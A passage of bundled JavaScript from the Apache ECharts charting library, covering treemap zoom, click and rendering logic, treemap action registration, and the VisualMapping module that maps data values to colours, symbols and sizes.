rootLayout.y + e.dy,\n                    width: rootLayout.width, height: rootLayout.height\n                }\n            });\n        }\n    },\n\n    /**\n     * @private\n     */\n    _onZoom: function (e) {\n        var mouseX = e.originX;\n        var mouseY = e.originY;\n\n        if (this._state !== 'animating') {\n            // These param must not be cached.\n            var root = this.seriesModel.getData().tree.root;\n\n            if (!root) {\n                return;\n            }\n\n            var rootLayout = root.getLayout();\n\n            if (!rootLayout) {\n                return;\n            }\n\n            var rect = new BoundingRect(\n                rootLayout.x, rootLayout.y, rootLayout.width, rootLayout.height\n            );\n            var layoutInfo = this.seriesModel.layoutInfo;\n\n            // Transform mouse coord from global to containerGroup.\n            mouseX -= layoutInfo.x;\n            mouseY -= layoutInfo.y;\n\n            // Scale root bounding rect.\n            var m = create$1();\n            translate(m, m, [-mouseX, -mouseY]);\n            scale$1(m, m, [e.scale, e.scale]);\n            translate(m, m, [mouseX, mouseY]);\n\n            rect.applyTransform(m);\n\n            this.api.dispatchAction({\n                type: 'treemapRender',\n                from: this.uid,\n                seriesId: this.seriesModel.id,\n                rootRect: {\n                    x: rect.x, y: rect.y,\n                    width: rect.width, height: rect.height\n                }\n            });\n        }\n    },\n\n    /**\n     * @private\n     */\n    _initEvents: function (containerGroup) {\n        containerGroup.on('click', function (e) {\n            if (this._state !== 'ready') {\n                return;\n            }\n\n            var nodeClick = this.seriesModel.get('nodeClick', true);\n\n            if (!nodeClick) {\n                return;\n            }\n\n            var targetInfo = this.findTarget(e.offsetX, e.offsetY);\n\n            if (!targetInfo) {\n                return;\n            }\n\n            var node = targetInfo.node;\n            if (node.getLayout().isLeafRoot) {\n                this._rootToNode(targetInfo);\n            }\n            else {\n                if (nodeClick === 'zoomToNode') {\n                    this._zoomToNode(targetInfo);\n                }\n                else if (nodeClick === 'link') {\n                    var itemModel = node.hostTree.data.getItemModel(node.dataIndex);\n                    var link = itemModel.get('link', true);\n                    var linkTarget = itemModel.get('target', true) || 'blank';\n                    link && window.open(link, linkTarget);\n                }\n            }\n\n        }, this);\n    },\n\n    /**\n     * @private\n     */\n    _renderBreadcrumb: function (seriesModel, api, targetInfo) {\n        if (!targetInfo) {\n            targetInfo = seriesModel.get('leafDepth', true) != null\n                ? {node: seriesModel.getViewRoot()}\n                // FIXME\n                // better way?\n                // Find breadcrumb tail on center of containerGroup.\n                : this.findTarget(api.getWidth() / 2, api.getHeight() / 2);\n\n            if (!targetInfo) {\n                targetInfo = {node: seriesModel.getData().tree.root};\n            }\n        }\n\n        (this._breadcrumb || (this._breadcrumb = new Breadcrumb(this.group)))\n            .render(seriesModel, api, targetInfo.node, bind$1(onSelect, this));\n\n        function onSelect(node) {\n            if (this._state !== 'animating') {\n                aboveViewRoot(seriesModel.getViewRoot(), node)\n                    ? this._rootToNode({node: node})\n                    : this._zoomToNode({node: node});\n            }\n        }\n    },\n\n    /**\n     * @override\n     */\n    remove: function () {\n        this._clearController();\n        this._containerGroup && this._containerGroup.removeAll();\n        this._storage = createStorage();\n        this._state = 'ready';\n        this._breadcrumb && this._breadcrumb.remove();\n    },\n\n    dispose: function () {\n        this._clearController();\n    },\n\n    /**\n     * @private\n     */\n    _zoomToNode: function (targetInfo) {\n        this.api.dispatchAction({\n            type: 'treemapZoomToNode',\n            from: this.uid,\n            seriesId: this.seriesModel.id,\n            targetNode: targetInfo.node\n        });\n    },\n\n    /**\n     * @private\n     */\n    _rootToNode: function (targetInfo) {\n        this.api.dispatchAction({\n            type: 'treemapRootToNode',\n            from: this.uid,\n            seriesId: this.seriesModel.id,\n            targetNode: targetInfo.node\n        });\n    },\n\n    /**\n     * @public\n     * @param {number} x Global coord x.\n     * @param {number} y Global coord y.\n     * @return {Object} info If not found, return undefined;\n     * @return {number} info.node Target node.\n     * @return {number} info.offsetX x refer to target node.\n     * @return {number} info.offsetY y refer to target node.\n     */\n    findTarget: function (x, y) {\n        var targetInfo;\n        var viewRoot = this.seriesModel.getViewRoot();\n\n        viewRoot.eachNode({attr: 'viewChildren', order: 'preorder'}, function (node) {\n            var bgEl = this._storage.background[node.getRawIndex()];\n            // If invisible, there might be no element.\n            if (bgEl) {\n                var point = bgEl.transformCoordToLocal(x, y);\n                var shape = bgEl.shape;\n\n                // For performance consideration, dont use 'getBoundingRect'.\n                if (shape.x <= point[0]\n                    && point[0] <= shape.x + shape.width\n                    && shape.y <= point[1]\n                    && point[1] <= shape.y + shape.height\n                ) {\n                    targetInfo = {node: node, offsetX: point[0], offsetY: point[1]};\n                }\n                else {\n                    return false; // Suppress visit subtree.\n                }\n            }\n        }, this);\n\n        return targetInfo;\n    }\n\n});\n\n/**\n * @inner\n */\nfunction createStorage() {\n    return {nodeGroup: [], background: [], content: []};\n}\n\n/**\n * @inner\n * @return Return undefined means do not travel further.\n */\nfunction renderNode(\n    seriesModel, thisStorage, oldStorage, reRoot,\n    lastsForAnimation, willInvisibleEls,\n    thisNode, oldNode, parentGroup, depth\n) {\n    // Whether under viewRoot.\n    if (!thisNode) {\n        // Deleting nodes will be performed finally. This method just find\n        // element from old storage, or create new element, set them to new\n        // storage, and set styles.\n        return;\n    }\n\n    // -------------------------------------------------------------------\n    // Start of closure variables available in \"Procedures in renderNode\".\n\n    var thisLayout = thisNode.getLayout();\n    var data = seriesModel.getData();\n\n    // Only for enabling highlight/downplay. Clear firstly.\n    // Because some node will not be rendered.\n    data.setItemGraphicEl(thisNode.dataIndex, null);\n\n    if (!thisLayout || !thisLayout.isInView) {\n        return;\n    }\n\n    var thisWidth = thisLayout.width;\n    var thisHeight = thisLayout.height;\n    var borderWidth = thisLayout.borderWidth;\n    var thisInvisible = thisLayout.invisible;\n\n    var thisRawIndex = thisNode.getRawIndex();\n    var oldRawIndex = oldNode && oldNode.getRawIndex();\n\n    var thisViewChildren = thisNode.viewChildren;\n    var upperHeight = thisLayout.upperHeight;\n    var isParent = thisViewChildren && thisViewChildren.length;\n    var itemStyleNormalModel = thisNode.getModel('itemStyle');\n    var itemStyleEmphasisModel = thisNode.getModel('emphasis.itemStyle');\n\n    // End of closure ariables available in \"Procedures in renderNode\".\n    // -----------------------------------------------------------------\n\n    // Node group\n    var group = giveGraphic('nodeGroup', Group$2);\n\n    if (!group) {\n        return;\n    }\n\n    parentGroup.add(group);\n    // x,y are not set when el is above view root.\n    group.attr('position', [thisLayout.x || 0, thisLayout.y || 0]);\n    group.__tmNodeWidth = thisWidth;\n    group.__tmNodeHeight = thisHeight;\n\n    if (thisLayout.isAboveViewRoot) {\n        return group;\n    }\n\n    var nodeModel = thisNode.getModel();\n\n    // Background\n    var bg = giveGraphic('background', Rect$1, depth, Z_BG);\n    bg && renderBackground(group, bg, isParent && thisLayout.upperHeight);\n\n    // No children, render content.\n    if (isParent) {\n        // Because of the implementation about \"traverse\" in graphic hover style, we\n        // can not set hover listener on the \"group\" of non-leaf node. Otherwise the\n        // hover event from the descendents will be listenered.\n        if (isHighDownDispatcher(group)) {\n            setAsHighDownDispatcher(group, false);\n        }\n        if (bg) {\n            setAsHighDownDispatcher(bg, true);\n            // Only for enabling highlight/downplay.\n            data.setItemGraphicEl(thisNode.dataIndex, bg);\n        }\n    }\n    else {\n        var content = giveGraphic('content', Rect$1, depth, Z_CONTENT);\n        content && renderContent(group, content);\n\n        if (bg && isHighDownDispatcher(bg)) {\n            setAsHighDownDispatcher(bg, false);\n        }\n        setAsHighDownDispatcher(group, true);\n        // Only for enabling highlight/downplay.\n        data.setItemGraphicEl(thisNode.dataIndex, group);\n    }\n\n    return group;\n\n    // ----------------------------\n    // | Procedures in renderNode |\n    // ----------------------------\n\n    function renderBackground(group, bg, useUpperLabel) {\n        // For tooltip.\n        bg.dataIndex = thisNode.dataIndex;\n        bg.seriesIndex = seriesModel.seriesIndex;\n\n        bg.setShape({x: 0, y: 0, width: thisWidth, height: thisHeight});\n\n        if (thisInvisible) {\n            // If invisible, do not set visual, otherwise the element will\n            // change immediately before animation. We think it is OK to\n            // remain its origin color when moving out of the view window.\n            processInvisible(bg);\n        }\n        else {\n            bg.invisible = false;\n            var visualBorderColor = thisNode.getVisual('borderColor', true);\n            var emphasisBorderColor = itemStyleEmphasisModel.get('borderColor');\n            var normalStyle = getItemStyleNormal(itemStyleNormalModel);\n            normalStyle.fill = visualBorderColor;\n            var emphasisStyle = getItemStyleEmphasis(itemStyleEmphasisModel);\n            emphasisStyle.fill = emphasisBorderColor;\n\n            if (useUpperLabel) {\n                var upperLabelWidth = thisWidth - 2 * borderWidth;\n\n                prepareText(\n                    normalStyle, emphasisStyle, visualBorderColor, upperLabelWidth, upperHeight,\n                    {x: borderWidth, y: 0, width: upperLabelWidth, height: upperHeight}\n                );\n            }\n            // For old bg.\n            else {\n                normalStyle.text = emphasisStyle.text = null;\n            }\n\n            bg.setStyle(normalStyle);\n            setElementHoverStyle(bg, emphasisStyle);\n        }\n\n        group.add(bg);\n    }\n\n    function renderContent(group, content) {\n        // For tooltip.\n        content.dataIndex = thisNode.dataIndex;\n        content.seriesIndex = seriesModel.seriesIndex;\n\n        var contentWidth = Math.max(thisWidth - 2 * borderWidth, 0);\n        var contentHeight = Math.max(thisHeight - 2 * borderWidth, 0);\n\n        content.culling = true;\n        content.setShape({\n            x: borderWidth,\n            y: borderWidth,\n            width: contentWidth,\n            height: contentHeight\n        });\n\n        if (thisInvisible) {\n            // If invisible, do not set visual, otherwise the element will\n            // change immediately before animation. We think it is OK to\n            // remain its origin color when moving out of the view window.\n            processInvisible(content);\n        }\n        else {\n            content.invisible = false;\n            var visualColor = thisNode.getVisual('color', true);\n            var normalStyle = getItemStyleNormal(itemStyleNormalModel);\n            normalStyle.fill = visualColor;\n            var emphasisStyle = getItemStyleEmphasis(itemStyleEmphasisModel);\n\n            prepareText(normalStyle, emphasisStyle, visualColor, contentWidth, contentHeight);\n\n            content.setStyle(normalStyle);\n            setElementHoverStyle(content, emphasisStyle);\n        }\n\n        group.add(content);\n    }\n\n    function processInvisible(element) {\n        // Delay invisible setting utill animation finished,\n        // avoid element vanish suddenly before animation.\n        !element.invisible && willInvisibleEls.push(element);\n    }\n\n    function prepareText(normalStyle, emphasisStyle, visualColor, width, height, upperLabelRect) {\n        var text = retrieve(\n            seriesModel.getFormattedLabel(\n                thisNode.dataIndex, 'normal', null, null, upperLabelRect ? 'upperLabel' : 'label'\n            ),\n            nodeModel.get('name')\n        );\n        if (!upperLabelRect && thisLayout.isLeafRoot) {\n            var iconChar = seriesModel.get('drillDownIcon', true);\n            text = iconChar ? iconChar + ' ' + text : text;\n        }\n\n        var normalLabelModel = nodeModel.getModel(\n            upperLabelRect ? PATH_UPPERLABEL_NORMAL : PATH_LABEL_NOAMAL\n        );\n        var emphasisLabelModel = nodeModel.getModel(\n            upperLabelRect ? PATH_UPPERLABEL_EMPHASIS : PATH_LABEL_EMPHASIS\n        );\n\n        var isShow = normalLabelModel.getShallow('show');\n\n        setLabelStyle(\n            normalStyle, emphasisStyle, normalLabelModel, emphasisLabelModel,\n            {\n                defaultText: isShow ? text : null,\n                autoColor: visualColor,\n                isRectText: true\n            }\n        );\n\n        upperLabelRect && (normalStyle.textRect = clone(upperLabelRect));\n\n        normalStyle.truncate = (isShow && normalLabelModel.get('ellipsis'))\n            ? {\n                outerWidth: width,\n                outerHeight: height,\n                minChar: 2\n            }\n            : null;\n    }\n\n    function giveGraphic(storageName, Ctor, depth, z) {\n        var element = oldRawIndex != null && oldStorage[storageName][oldRawIndex];\n        var lasts = lastsForAnimation[storageName];\n\n        if (element) {\n            // Remove from oldStorage\n            oldStorage[storageName][oldRawIndex] = null;\n            prepareAnimationWhenHasOld(lasts, element, storageName);\n        }\n        // If invisible and no old element, do not create new element (for optimizing).\n        else if (!thisInvisible) {\n            element = new Ctor({z: calculateZ(depth, z)});\n            element.__tmDepth = depth;\n            element.__tmStorageName = storageName;\n            prepareAnimationWhenNoOld(lasts, element, storageName);\n        }\n\n        // Set to thisStorage\n        return (thisStorage[storageName][thisRawIndex] = element);\n    }\n\n    function prepareAnimationWhenHasOld(lasts, element, storageName) {\n        var lastCfg = lasts[thisRawIndex] = {};\n        lastCfg.old = storageName === 'nodeGroup'\n            ? element.position.slice()\n            : extend({}, element.shape);\n    }\n\n    // If a element is new, we need to find the animation start point carefully,\n    // otherwise it will looks strange when 'zoomToNode'.\n    function prepareAnimationWhenNoOld(lasts, element, storageName) {\n        var lastCfg = lasts[thisRawIndex] = {};\n        var parentNode = thisNode.parentNode;\n\n        if (parentNode && (!reRoot || reRoot.direction === 'drillDown')) {\n            var parentOldX = 0;\n            var parentOldY = 0;\n\n            // New nodes appear from right-bottom corner in 'zoomToNode' animation.\n            // For convenience, get old bounding rect from background.\n            var parentOldBg = lastsForAnimation.background[parentNode.getRawIndex()];\n            if (!reRoot && parentOldBg && parentOldBg.old) {\n                parentOldX = parentOldBg.old.width;\n                parentOldY = parentOldBg.old.height;\n            }\n\n            // When no parent old shape found, its parent is new too,\n            // so we can just use {x:0, y:0}.\n            lastCfg.old = storageName === 'nodeGroup'\n                ? [0, parentOldY]\n                : {x: parentOldX, y: parentOldY, width: 0, height: 0};\n        }\n\n        // Fade in, user can be aware that these nodes are new.\n        lastCfg.fadein = storageName !== 'nodeGroup';\n    }\n\n}\n\n// We can not set all backgroud with the same z, Because the behaviour of\n// drill down and roll up differ background creation sequence from tree\n// hierarchy sequence, which cause that lowser background element overlap\n// upper ones. So we calculate z based on depth.\n// Moreover, we try to shrink down z interval to [0, 1] to avoid that\n// treemap with large z overlaps other components.\nfunction calculateZ(depth, zInLevel) {\n    var zb = depth * Z_BASE + zInLevel;\n    return (zb - 1) / zb;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @file Treemap action\n */\n\nvar noop$1 = function () {};\n\nvar actionTypes = [\n    'treemapZoomToNode',\n    'treemapRender',\n    'treemapMove'\n];\n\nfor (var i$2 = 0; i$2 < actionTypes.length; i$2++) {\n    registerAction({type: actionTypes[i$2], update: 'updateView'}, noop$1);\n}\n\nregisterAction(\n    {type: 'treemapRootToNode', update: 'updateView'},\n    function (payload, ecModel) {\n\n        ecModel.eachComponent(\n            {mainType: 'series', subType: 'treemap', query: payload},\n            handleRootToNode\n        );\n\n        function handleRootToNode(model, index) {\n            var types = ['treemapZoomToNode', 'treemapRootToNode'];\n            var targetInfo = retrieveTargetInfo(payload, types, model);\n\n            if (targetInfo) {\n                var originViewRoot = model.getViewRoot();\n                if (originViewRoot) {\n                    payload.direction = aboveViewRoot(originViewRoot, targetInfo.node)\n                        ? 'rollUp' : 'drillDown';\n                }\n                model.resetViewRoot(targetInfo.node);\n            }\n        }\n    }\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$9 = each$1;\nvar isObject$5 = isObject$1;\n\nvar CATEGORY_DEFAULT_VISUAL_INDEX = -1;\n\n/**\n * @param {Object} option\n * @param {string} [option.type] See visualHandlers.\n * @param {string} [option.mappingMethod] 'linear' or 'piecewise' or 'category' or 'fixed'\n * @param {Array.<number>=} [option.dataExtent] [minExtent, maxExtent],\n *                                              required when mappingMethod is 'linear'\n * @param {Array.<Object>=} [option.pieceList] [\n *                                             {value: someValue},\n *                                             {interval: [min1, max1], visual: {...}},\n *                                             {interval: [min2, max2]}\n *                                             ],\n *                                            required when mappingMethod is 'piecewise'.\n *                                            Visual for only each piece can be specified.\n * @param {Array.<string|Object>=} [option.categories] ['cate1', 'cate2']\n *                                            required when mappingMethod is 'category'.\n *                                            If no option.categories, categories is set\n *                                            as [0, 1, 2, ...].\n * @param {boolean} [option.loop=false] Whether loop mapping when mappingMethod is 'category'.\n * @param {(Array|Object|*)} [option.visual]  Visual data.\n *                                            when mappingMethod is 'category',\n *                                            visual data can be array or object\n *                                            (like: {cate1: '#222', none: '#fff'})\n *                                            or primary types (which represents\n *                                            defualt category visual), otherwise visual\n *                                            can be array or primary (which will be\n *                                            normalized to array).\n *\n */\nvar VisualMapping = function (option) {\n    var mappingMethod = option.mappingMethod;\n    var visualType = option.type;\n\n    /**\n     * @readOnly\n     * @type {Object}\n     */\n    var thisOption = this.option = clone(option);\n\n    /**\n     * @readOnly\n     * @type {string}\n     */\n    this.type = visualType;\n\n    /**\n     * @readOnly\n     * @type {string}\n     */\n    this.mappingMethod = mappingMethod;\n\n    /**\n     * @private\n     * @type {Function}\n     */\n    this._normalizeData = normalizers[mappingMethod];\n\n    var visualHandler = visualHandlers[visualType];\n\n    /**\n     * @public\n     * @type {Function}\n     */\n    this.applyVisual = visualHandler.applyVisual;\n\n    /**\n     * @public\n     * @type {Function}\n     */\n    this.getColorMapper = visualHandler.getColorMapper;\n\n    /**\n     * @private\n     * @type {Function}\n     */\n    this._doMap = visualHandler._doMap[mappingMethod];\n\n    if (mappingMethod === 'piecewise') {\n        normalizeVisualRange(thisOption);\n        preprocessForPiecewise(thisOption);\n    }\n    else if (mappingMethod === 'category') {\n        thisOption.categories\n            ? preprocessForSpecifiedCategory(thisOption)\n            // categories is ordinal when thisOption.categories not specified,\n            // which need no more preprocess except normalize visual.\n            : normalizeVisualRange(thisOption, true);\n    }\n    else { // mappingMethod === 'linear' or 'fixed'\n        assert$1(mappingMethod !== 'linear' || thisOption.dataExtent);\n        normalizeVisualRange(thisOption);\n    }\n};\n\nVisualMapping.prototype = {\n\n    constructor: VisualMapping,\n\n    mapValueToVisual: function (value) {\n        var normalized = this._normalizeData(value);\n        return this._doMap(normalized, value);\n    },\n\n    getNormalizer: function () {\n        return bind(this._normalizeData, this);\n    }\n};\n\nvar visualHandlers = VisualMapping.visualHandlers = {\n\n    color: {\n\n        applyVisual: makeApplyVisual('color'),\n\n        /**\n         * Create a mapper function\n         * @return {Function}\n         */\n        getColorMapper: function () {\n            var thisOption = this.option;\n\n            return bind(\n                thisOption.mappingMethod === 'category'\n                    ? function (value, isNormalized) {\n                        !isNormalized && (value = this._normalizeData(value));\n                        return doMapCategory.call(this, value);\n                    }\n                    : function (value, isNormalized, out) {\n                        // If output rgb array\n                        // which will be much faster and useful in pixel manipulation\n                        var returnRGBArray = !!out;\n                        !isNormalized && (value = this._normalizeData(value));\n                        out = fastLerp(value, thisOption.parsedVisual, out);\n                        return returnRGBArray ? out : stringify(out, 'rgba');\n                    },\n                this\n            );\n        },\n\n        _doMap: {\n            linear: function (normalized) {\n                return stringify(\n                    fastLerp(normalized, this.option.parsedVisual),\n                    'rgba'\n                );\n            },\n            category: doMapCategory,\n            piecewise: function (normalized, value) {\n                var result = getSpecifiedVisual.call(this, value);\n                if (result == null) {\n                    result = stringify(\n                        fastLerp(normalized, this.option.parsedVisual),\n                        'rgba'\n                    );\n                }\n                return result;\n            },\n            fixed: doMapFixed\n        }\n    },\n\n    colorHue: makePartialColorVisualHandler(function (color, value) {\n        return modifyHSL(color, value);\n    }),\n\n    colorSaturation: makePartialColorVisualHandler(function (color, value) {\n        return modifyHSL(color, null, value);\n    }),\n\n    colorLightness: makePartialColorVisualHandler(function (color, value) {\n        return modifyHSL(color, null, null, value);\n    }),\n\n    colorAlpha: makePartialColorVisualHandler(function (color, value) {\n        return modifyAlpha(color, value);\n    }),\n\n    opacity: {\n        applyVisual: makeApplyVisual('opacity'),\n        _doMap: makeDoMap([0, 1])\n    },\n\n    liftZ: {\n        applyVisual: makeApplyVisual('liftZ'),\n        _doMap: {\n            linear: doMapFixed,\n            category: doMapFixed,\n            piecewise: doMapFixed,\n            fixed: doMapFixed\n        }\n    },\n\n    symbol: {\n        applyVisual: function (value, getter, setter) {\n            var symbolCfg = this.mapValueToVisual(value);\n            if (isString(symbolCfg)) {\n                setter('symbol', symbolCfg);\n            }\n            else if (isObject$5(symbolCfg)) {\n                for (var name in symbolCfg) {\n                    if (symbolCfg.hasOwnProperty(name)) {\n                        setter(name, symbolCfg[name]);\n                    }\n                }\n            }\n        },\n        _doMap: {\n            linear: doMapToArray,\n            category: doMapCategory,\n            piecewise: function (normalized, value) {\n                var result = getSpecifiedVisual.call(this, value);\n                if (result == null) {\n                    result = doMapToArray.call(this, normalized);\n                }\n                return result;\n            },\n            fixed: doMapFixed\n        }\n    },\n\n    symbolSize: {\n        applyVisual: makeApplyVisual('symbolSize'),\n        _doMap: makeDoMap([0, 1])\n    }\n};\n\n\nfunction preprocessForPiecewise(thisOption) {\n    var pieceList = thisOption.pieceList;\n    thisOption.hasSpecialVisual = false;\n\n    each$1(pieceList, function (piece, index) {\n        piece.originIndex = index;\n        // piece.visual is \"result visual value\" but not\n        // a visual range, so it does not need to be normalized.\n        if (piece.visual != null) {\n            thisOption.hasSpecialVisual = true;\n        }\n    });\n}\n\nfunction preprocessForSpecifiedCategory(thisOption) {\n    // Hash categories.\n    var categories = thisOption.categories;\n    var visual = thisOption.visual;\n\n    var categoryMap = thisOption.categoryMap = {};\n    each$9(categories, function (cate, index) {\n        categoryMap[cate] = index;\n    });\n\n    // Process visual map input.\n    if (!isArray(visual)) {\n        var visualArr = [];\n\n        if (isObject$1(visual)) {\n            each$9(visual, function (v, cate) {\n                var index = categoryMap[cate];\n                visualArr[index != null ? index : CATEGORY_DEFAULT_VISUAL_INDEX] = v;\n            });\n        }\n        else { // Is primary type, represents default visual.\n            visualArr[CATEGORY_DEFAULT_VISUAL_INDEX] = visual;\n        }\n\n        visual = setVisualToOption(thisOption, visualArr);\n    }\n\n    // Remove categories that has no visual,\n    // then we can mapping them to CATEGORY_DEFAULT_VISUAL_INDEX.\n    for (var i = categories.length - 1; i >= 0; i--) {\n        if (visual[i] == null) {\n            delete categoryMap[categories[i]];\n            categories.pop();\n        }\n    }\n}\n\nfunction normalizeVisualRange(thisOption, isCategory) {\n    var visual = thisOption.visual;\n    var visualArr = [];\n\n    if (isObject$1(visual)) {\n        each$9(visual, function (v) {\n            visualArr.push(v);\n        });\n    }\n    else if (visual != null) {\n        visualArr.push(visual);\n    }\n\n    var doNotNeedPair = {color: 1, symbol: 1};\n\n    if (!isCategory\n        && visualArr.length === 1\n        && !doNotNeedPair.hasOwnProperty(thisOption.type)\n    ) {\n        // Do not care visualArr.length === 0, which is illegal.\n        visualArr[1] = visualArr[0];\n    }\n\n    setVisualToOption(thisOption, visualArr);\n}\n\nfunction makePartialColorVisualHandler(applyValue) {\n    return {\n        applyVisual: function (value, getter, setter) {\n            value = this.mapValueToVisual(value);\n            // Must not be array value\n            setter('color', applyValue(getter('color'), value));\n        },\n        _doMap: makeDoMap([0, 1])\n    };\n}\n\nfunction doMapToArray(normalized) {\n    var visual = this.option.visual;\n    return visual[\n        Math.round(linearMap(normalized, [0, 1], [0, visual.length - 1], true))\n    ] || {};\n}\n\nfunction makeApplyVisual(visualType) {\n    return function (value, getter, setter) {\n        setter(visualType, this.mapValueToVisual(value));\n    };\n}\n\nfunction doMapCategory(normalized) {\n    var visual = this.option.visual;\n    return visual[\n        (this.option.loop && normalized !== CATEGORY_DEFAULT_VISUAL_INDEX)\n            ? normalized % visual.length\n            : normalized\n    ];\n}\n\nfunction doMapFixed() {\n    return this.option.visual[0];\n}\n\nfunction makeDoMap(sourceExtent) {\n    return {\n        linear: function (normalized) {\n            return linearMap(normalized, sourceExtent, this.option.visual, true);\n        },\n        category: doMapCategory,\n        piecewise: function (normalized, value) {\n            var result = getSpecifiedVisual.call(this, value);\n            if (result == null) {\n                result = linearMap(normalized, sourceExtent, this.option.visual, true);\n            }\n            return result;\n        },\n        fixed: doMapFixed\n    };\n}\n\nfunction getSpecifiedVisual(value) {\n    var thisOption = this.option;\n    var pieceList = thisOption.pieceList;\n    if (thisOption.hasSpecialVisual) {\n        var pieceIndex = VisualMapping.findPieceIndex(value, pieceList);\n        var piece = pieceList[pieceIndex];\n        if (piece && piece.visual) {\n            return piece.visual[this.type];\n        }\n    }\n}\n\nfunction setVisualToOption(thisOption, visualArr) {\n    thisOption.visual = visualArr;\n    if (thisOption.type === 'color') {\n        thisOption.parsedVisual = map(visualArr, function (item) {\n            return parse(item);\n        });\n    }\n    return visualArr;\n}\n\n\n/**\n * Normalizers by mapping methods.\n */\nvar normalizers = {\n\n    linear: function (value) {\n        return linearMap(value, this.option.dataExtent, [0, 1], true);\n    },\n\n    piecewise: function (value) {\n        var pieceList = this.option.pieceList;\n        var pieceIndex = VisualMapping.findPieceIndex(value, pieceList, true);\n        if (pieceIndex != null) {\n            return linearMap(pieceIndex, [0, pieceList.length - 1], [0, 1], true);\n        }\n    },\n\n    category: function (value) {\n        var index = this.option.categories\n            ? this.option.categoryMap[value]\n            : value; // ordinal\n        return index == null ? CATEGORY_DEFAULT_VISUAL_INDEX : index;\n    },\n\n    fixed: noop\n};\n\n\n\n/**\n * List available visual types.\n *\n * @public\n * @return {Array.<string>}\n */\nVisualMapping.listVisualTypes = function () {\n    var visualTypes = [];\n    each$1(visualHandlers, function (handler, key) {\n        visualTypes.push(key);\n    });\n    return visualTypes;\n};\n\n/**\n * @public\n */\nVisualMapping.addVisualHandler = function (name, handler) {\n    visualHandlers[name] = handler;\n};\n\n/**\n * @public\n */\nVisualMapping.isValidType = function (visualType) {\n    return visualHandlers.hasOwnProperty(visualType);\n};\n\n/**\n * Convinent method.\n * Visual can be Object or Array or primary type.\n *\n * @public\n */\nVisualMapping.eachVisual = function (visual, callback, context) {\n    if (isObject$1(visual)) {\n        each$1(visual, callback, context);\n    }\n    else {\n        callback.call(context, visual);\n    }\n};\n\nVisualMapping.mapVisual = function (visual, callback, context) {\n    var isPrimary;\n    var newVisual = isArray(visual)\n        ? []\n        : isObject$1(visual)\n        ? {}\n        : (isPrimary = true, null);\n\n    VisualMapping.eachVisual(visual, function (v, key) {\n        var newVal = callback.call(context, v, key);\n        isPrimary ? (newVisual = newVal) : (newVisual[key] = newVal);\n    });\n    return newVisual;\n};\n\n/**\n * @public\n * @param {Object} obj\n * @return {Object} new object containers visual values.\n *                 If no visuals, return null.\n */\nVisualMapping.retrieveVisuals = function (obj) {\n    var ret = {};\n    var hasVisual;\n\n    obj && each$9(visualHandlers, function (h, visualType) {\n        if (obj.hasOwnProperty(visualType)) {\n            ret[visualType] = obj[visualType];\n            hasVisual = true;\n        }\n    });\n\n    return hasVisual ? ret : null;\n};\n\n/**\n * Give order to visual types, considering colorSaturation, colorAlpha depends on color.\n *\n * @public\n * @param {(Object|Array)} visualTypes If Object, like: {color: ..., colorSaturation: ...}\n *                                     IF Array, like: ['color', 'symbol', 'colorSaturation']\n * @return {Array.<string>} Sorted visual types.\n */\nVisualMapping.prepareVisualTypes = function (visualTypes) {\n    if (isObject$5(visualTypes)) {\n        var types = [];\n        each$9(visualTypes, function (item, type) {\n            types.push(type);\n        });\n        visualTypes = types;\n    }\n    else if (isArray(visualTypes)) {\n        visualTypes = visualTypes.slice();\n    }\n    else {\n        return [];\n    }\n\n    visualTypes.sort(function (type1, type2) {\n        // color should be front of colorSaturation, colorAlpha, ...\n        // symbol and symbolSize do not matter.\n        return (type2 === 'color' && type1 !== 'color' && type1.indexOf('color') === 0)\n            ? 1 : -1;\n    });\n\n    return visualTypes;\n};\n\n/**\n * 'color', 'colorSaturation', 'colorAlpha', ... are depends on 'color'.\n * Other visuals are only depends on themself.\n *\n * @public\n * @param {string} visualType1\n * @param {string} visualType2\n * @return {boolean}\n */\nVisualMapping.dependsOn = function (visualType1, visualType2) {\n    return visualType2 === 'color'\n        ? !!(visualType1 && visualType1.indexOf(visualType2) === 0)\n        : visualType1 === visualType2;\n};\n\n/**\n * @param {number} value\n * @param {Array.<Object>} pieceList [{value: ..., interval: [min, max]}, ...]\n *                         Always from small to big.\n * @param {boolean} [findClosestWhenOutside=false]\n * @return {number} index\n */\nVisualMapping.findPieceIndex = function (value, pieceList, findClosestWhenOutside) {\n    var possibleI;\n    var abs = Infinity;\n\n    // value has the higher priority.\n    for (var i = 0, len = pieceList.length; i < len; i++) {\n        var pieceValue = pieceList[i].value;\n        if (pieceValue != null) {\n            if (pieceValue === value\n                // FIXME\n                // It is supposed to compare value according to value type of dimension,\n                // but currently value type can exactly be string or number.\n                // Compromise for numeric-like string (like '12'), especially\n                // in the case that visualMap.categories is ['22', '33'].\n                || (typeof pieceValue === 'string' && pieceValue === value + '')\n            ) {\n                return i;\n            }\n            findClosestWhenOutside && updatePossible(pieceValue, i);\n        }\n    }\n\n    for (var i = 0, len = pieceList.length; i < len; i++) {\n        var piece = pieceList[i];\n        var interval = piece.interval;\n        var close = piece.close;\n\n        if (interval) {\n            if (interval[0] === -Infinity) {\n                if (littleThan(close[1], value, interval[1])) {\n                    return i;\n                }\n            }\n            else if (interval[1] === Infinity) {\n                if (littleThan(close[0], interval[0], value)) {\n                    return i;\n                }\n            }\n            else if (\n                littleThan(close[0], interval[0], value)\n                && littleThan(close[1], value, 